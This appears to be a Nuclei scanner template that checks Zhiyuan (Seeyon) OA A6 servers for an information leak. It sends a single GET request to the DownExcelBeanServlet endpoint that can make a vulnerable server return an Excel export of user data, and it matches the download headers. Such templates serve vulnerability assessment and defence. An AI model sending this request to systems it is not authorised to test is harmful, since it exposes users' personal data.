id: zhiyuan-oa-info-leak info: name: Zhiyuan Oa A6-s info Leak author: pikpikcu severity: info reference: - https://github.com/apachecn/sec-wiki/blob/c73367f88026f165b02a1116fe1f1cd2b8e8ac37/doc/unclassified/zhfly3351.md metadata: max-request: 1 tags: zhiyuan,leak,disclosure,seeyon http: - method: GET path: - "{{BaseURL}}/yyoa/DownExcelBeanServlet?contenttype=username&contentvalue=&state=1&per_id=0" matchers-condition: and matchers: - type: word words: - "attachment" - "application/x-msdownload" part: header condition: and - type: status status: - 200 # digest: 4b0a00483046022100cb1bb81cf6e4bf2569441166538b1ab89f9f635d52ca4a385c39bad9fbc1a4b8022100f1d35eb8c6509ae6058a82563dd1ae0ed680ee33c01674770bbb9803e30181a3:922c64590222798bb761d5b6d8e72950